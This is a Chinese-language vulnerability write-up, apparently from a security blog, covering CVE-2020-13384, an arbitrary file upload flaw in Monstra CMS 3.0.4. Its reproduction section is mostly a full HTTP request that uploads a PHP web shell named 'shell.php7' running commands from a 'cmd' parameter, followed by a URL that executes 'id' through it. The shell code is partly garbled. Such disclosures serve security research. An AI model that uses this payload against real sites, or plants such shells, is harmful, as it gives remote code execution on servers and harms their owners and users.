(CVE-2020-13384)Monstra_CMS_3.0.4_任意文件上传漏洞

# (CVE-2020-13384)Monstra CMS 3.0.4 任意文件上传漏洞

============

一、漏洞简介
————

Monstra CMS是乌克兰Sergey
Romanenko软件开发者的一套基于PHP的轻量级内容管理系统(CMS)。 Monstra
CMS
3.0.4版本中的index.php脚本存在安全漏洞,该漏洞源于程序没有正确验证文件扩展名。远程攻击者可借助特制HTTP请求利用该漏洞上载和执行任意PHP代码。

二、漏洞影响
————

Monstra CMS 3.0.4

三、复现过程
————

访问`https://www.0-sec.org/monstra/admin/index.php?id=filesmanager&path=uploads/`

POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: www.0-sec.org
Content-Length: 548
Cache-Control: max-age=0
Origin: https://www.0-sec.org
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://www.0-sec.org/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close

——WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name=”csrf”

2e6ae2353998caa319aae262b113c6b3f17a9636
——WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name=”file”; filename=”shell.php7″
Content-Type: application/octet-stream

“; $cmd = ($_REQUEST[‘cmd’]); system($cmd); echo “

“; die; }?>

——WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name=”upload_file”

Upload
——WebKitFormBoundarytRfyCkYq8NvztDBf–

`https://www.0-sec.org/monstra/public/uploads/shell.php7?cmd=id`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容